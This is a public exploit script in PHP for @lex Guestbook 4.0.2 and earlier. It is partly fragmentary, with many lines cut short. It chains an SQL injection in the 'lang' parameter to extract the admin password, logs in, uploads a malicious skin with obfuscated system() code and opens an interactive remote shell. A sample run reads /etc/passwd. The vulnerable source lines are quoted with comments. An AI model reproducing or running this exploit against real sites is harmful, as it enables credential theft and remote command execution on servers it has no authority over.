@lex Guestbook <= 4.0.2 Remote Command Execution Exploit
- Date: 7 Jan 2007 08:52:34 -0000
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
| header> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit
| header> ========================================================
| status> Retrieving the administrator password
| sploit> AdminUsername::root
| sploit> AdminPassword::toor
| status> Trying to get logged in
| sploit> Done
| status> Trying to add a skin
| sploit> Done
| status> Writing the malicious skin
| $shell> whoami
| darkfig
| $shell> cat /etc/passwd ...
if($argc < 2)
print "\n---------------------------------------------------------";
print "\nAffected.scr..: @lex Guestbook <= 4.0.2"; // last version
print "\nPoc.ID........: 20070107";
print "\nType..........: PHP Code Execution";
print "\nRisk.level....: High";
print "\nSrc.download..: www.alexphpteam.com";
print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
print "\nCredits.......: DarkFig";
print "\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url>";
print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "\nExample.......: php xpl.php http://victim.com/@lexgb/";
print "\n---------------------------------------------------------\n";
$xpl = new phpsploit();
if(!empty($prs)) $xpl->proxy($prs);
if(!empty($pra)) $xpl->proxyauth($pra);
| index.php
| =========
| ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
| livre_include.php -> Local File Inclusion
| =================
| ... set_magic_quotes_runtime(0); // thx =)
| ... if (isset($_GET['lang']) && $_GET['lang'] &&
| $f_language = str_replace("..","",$_GET['lang']); // We can't use ....
because of file_exists() verification but ... =]
| include($chem_absolu."languages/".$f_language.".".$alex_livre_ext);
| index.php -> SQL Injection
| =========
| ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE
lang='".$f_language."' and `type`='titre'");
| // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and
$sql = "index.php?lang=english.php%00'%20union%20select%20".
print "\nheader> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit";
print "\nheader> ========================================================";
print "\nstatus> Retrieving the administrator password";
print "\nsploit> AdminUsername::".$count[1]."\nsploit>
else die("\nsploit> Exploit failed");
print "\nstatus> Trying to get logged in";
print "\nsploit> Done";
else die("\nsploit> Exploit failed");
print "\nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/",
if(!preg_match('#alert\("ERREUR\n#',$xpl->getcontent())) print "\nsploit> Done";
else die("\nsploit> Exploit failed");
$scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d).".
$data = "skin_edit=skins.php%3Ff_sid%3D".$sid[1]."%26skin_edit".
print "\nstatus> Writing the malicious skin\n\$shell> ";
// skins.php ...
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
print $xpl->getcontent();
print "\n\$shell> ";